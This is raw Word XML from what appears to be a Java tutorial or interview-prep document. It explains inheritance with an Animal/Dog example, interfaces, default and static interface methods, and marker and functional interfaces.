          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3AD1090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sleep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0055177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sleeping.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B72A8C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C1544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CBE1D2" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27A2F29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hild class inheriting from Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314107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6DA327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tional property in child class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCDF1FE"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breed;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9680D" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A99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ild class specific method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="014D57A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0F273E6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6F921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C40A2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C6974B" w14:textId="77777777" w:rsidR="00514614" w:rsidRPr="00CE4B95" w:rsidRDefault="00514614" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37A6EE4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A0F6E4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05C5B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object of the Dog class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417F2BB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myDog = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BBE4D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46E72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properties and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081E44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name = "Buddy"; // Inherited from Animal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37602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reed = "Golden Retriever";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436FCC9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07DD2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methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FBCBC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eat();  // Output: Buddy is eating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169A1F5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leep(); // Output: Buddy is sleeping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B1870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95EE6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child class specific method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE7137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ark();  // Output: Buddy is barking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E1E13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9116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6D9F3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082ECE8"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og class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name, eat(), and sleep() methods from the Animal class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C762E2"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adds a new property (breed) and a method (bark()), which are specific to the Dog class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="712979CD"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myDog object calls eat(), sleep(), and bark(), it uses both inherited and newly defined methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F32977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2EABDE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eating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728312F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sleeping.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297A75D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barking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A07FEFD"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249CB">
          <v:rect id="_x0000_i1374" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FCE2518"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Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22720D38"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Child classes can reuse the methods and fields defined in the parent class, reducing the need to write duplicate code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C71EECB"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sibility</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can add new functionality in child classes without modifying the parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E2A63C"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Inheritance helps model relationships in the real world, such as "Dog is an Animal" or "Car is a Vehicle".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57100005"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Child classes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methods to provide their own implementation while still maintaining the same method signature.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDDB0D0"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35B622">
          <v:rect id="_x0000_i1375" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D4CBB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 About Inheritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589909FE"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Java supports </w:t>
      </w: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with classes, but a class can inherit from only one parent class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02214A8A"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heritance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Constructors are not inherited. However, a child class can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>invoke</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> the constructor of the parent class using super().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52354DDF"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Modifiers</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Private members of the parent class are not inherited by the child class. However, protected and public members are accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F957A0"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er Keyword</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Used to access the parent class methods, constructors, and variables from the child class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3906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98F179">
          <v:rect id="_x0000_i1376" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE6D1B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heritance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5808830B"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w:t>
      </w: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family heritage</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. For example, if a child inherits certain features from their parents, they may have the same eye color, height, or hair color. However, the child can also develop their own unique traits.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="599818DB"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provides common behaviors like eat() and sleep()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFE7DEC"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inherits from Animal but also has its own unique behavior, like bark()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7C9999" w14:textId="6DE8B56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05166FD">
          <v:rect id="_x0000_i1377" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDA6F66"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6" w:name="_Toc197867340"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the interface in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="126"/>
    </w:p>
    <w:p w14:paraId="3F086CB3" w14:textId="6CAEC30B" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856"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in Java is a reference type, similar to a class, that can contain only </w:t>
      </w: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public, static, final variables). It cannot have </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instance fiel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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413EEF2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faces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that classes must follow. Any class that implements an interface must provide implementations for all the methods declared by the interface (unless the class is abstract).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2669D37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nterfaces are used to achieve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xml:space="preserve"> (through interface implementation).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E207FF"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Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E5988F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Interfaces can contain abstract methods (methods without a body). The implementing class must provide a body for these methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE868F0"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Starting from Java 8, interfaces can have default methods with a body, providing a default implementation that can be overridden by the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0E86AB"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Interfaces can have static methods, which are associated with the interface itself, not with any instance of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E5132E6"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All variables declared in an interface are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>implicitly</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> public, static, and final, i.e., constants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1A872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A class can implement multiple interfaces, allowing a form of multiple inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BFEF0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57004F">
          <v:rect id="_x0000_i1378" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E42F102"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of an Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2924BC6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015CC41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does not have a body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EDB65D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21DDFD5D" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C4D901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a body)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="269D516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leep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C493CE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animal is sleeping");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B24B4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FDAE4A" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0914372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ant variable (public, static, final by default)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793DCB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 = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86DEE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22F568"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lementing an Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632D38F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implements an interface by providing concrete implementations for all abstract methods of the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE958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53EB07F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viding implementation for the abstract method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A9CE00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F4C265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5767CCB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barks");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4425851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F797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93368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lso override the default method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9F955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31CCB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leep() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3587E16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sleeps peacefully");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DEDA3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65AFB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1F8FC" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C89B3A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9BE4B9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4678B1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og = new Dog();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1350E9E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The dog barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2228E00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leep();   // Output: The dog sleeps peacefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152792D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37EB5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4D124C"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B38755">
          <v:rect id="_x0000_i1379" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DC3BA5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the Above Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D04F15"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 Declaration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Animal interface has one abstract method (sound()) and a default method (sleep()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A76AA4C"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r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Dog class implements the Animal interface and provides implementations for the abstract method sound() and overrides the default method sleep().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3570255D"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thods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The Dog object invokes the methods sound() and sleep(), showing how both abstract and default methods work.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A562F1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475931B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barks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D5015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sleeps peacefully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DA1217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B76F0">
          <v:rect id="_x0000_i1380" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="098EFC80"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Interfaces?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D797B8A"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Interfaces help in defining a contract of what methods a class should implement, without defining how these methods should be implemented.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48852A15"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In Java, a class can implement multiple interfaces, thus allowing it to inherit behavior from multiple sources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC566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97A66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17AEF39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C3AB84" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4697C19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alker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46EB9BF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walk();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CC580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5B09CB" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2093A2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alker {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ACD64E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14A50DC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s");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0E113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B72BDF" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F1AC90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alk() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219EE22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alks on 4 legs");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675750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ABD64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47DB93"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Interfaces allow for </w:t>
      </w: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between different parts of the program. A class can work with any implementation of an interface without needing to know the exact class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BF6D52"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EE8B5E">
          <v:rect id="_x0000_i1381" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D1B13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terfaces in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528951D1"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An interface with no methods or fields, used to indicate a special property or behavior for a class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7914A4E6"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erializable interface is a marker interface used to indicate that a class can be serialized.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280713ED"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n interface with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These are used primari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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3294350E"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Runnable, Callable, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC4184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FE42C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7F8BA95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String name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEDAC4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F708EB" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B1DF32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70588C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5C952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4CD1E93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greet("John");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BED58F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7B087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FFDBE6"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653A46">
          <v:rect id="_x0000_i1382" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3E244"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terface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652C312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s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agreement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that dictates what actions can be performed, but doesn't specify how those actions should be performed. For instance:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B65A484" w14:textId="77777777" w:rsidR="00566856" w:rsidRPr="00CE4B95" w:rsidRDefault="00566856" w:rsidP="003428CE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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might define methods like start(), stop(), and accelerate(). Any class (like Sedan, SUV, etc.) that implements the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will provide the specific implementation for these actions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35653A83"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796593">
          <v:rect id="_x0000_i1383" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0782966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Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37D1771D"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Interfaces allow for flexible, loosely coupled code that can evolve without breaking other parts of the program.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D3711E"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 Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Interfaces allow you to decouple the code from specific implementations and provide more reusable code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FA78715"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mplementations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can implement multiple interfaces in a single class, providing a form of multiple inheritance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CE78A7" w14:textId="32AD565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33BB83">
          <v:rect id="_x0000_i1384" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B35C2E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7" w:name="_Toc197867341"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Can we have a static method inside the interface?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="127"/>
    </w:p>
    <w:p w14:paraId="55C383AD" w14:textId="3D2CB41F" w:rsidR="005D5094" w:rsidRPr="00CE4B95" w:rsidRDefault="003428CE"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w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">es, </w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static methods</w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are allowed inside interfaces in Java, starting from </w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 8</w:t>
      </w:r>
      <w:r w:rsidR="005D5094" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A static method in an interface is associated with the interface itself, not with any instance of a class that implements the interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489F682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Static Methods in Interfaces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C6881"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an interface cannot be overridden by the implementing classes. They belong to the interface itself, not the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F1F4C2"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thods</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You access static methods in an interface using the interface name (not through an object instance).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08476C6E"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vs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Static methods are different from default methods. Static methods are called on the interface itself, whereas default methods can be called on objects of the implementing class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3717630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45996">
          <v:rect id="_x0000_i1385" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="173F87D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Static Method in Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B4B440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117EBE1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interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464EDB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5A5366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 in the interface.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8374E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27E63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B74C82"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in Interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFED51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442BB1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the interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F10171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escribe() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57523D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s are living organisms.");</w:t>
      </w:r>
    </w:p>
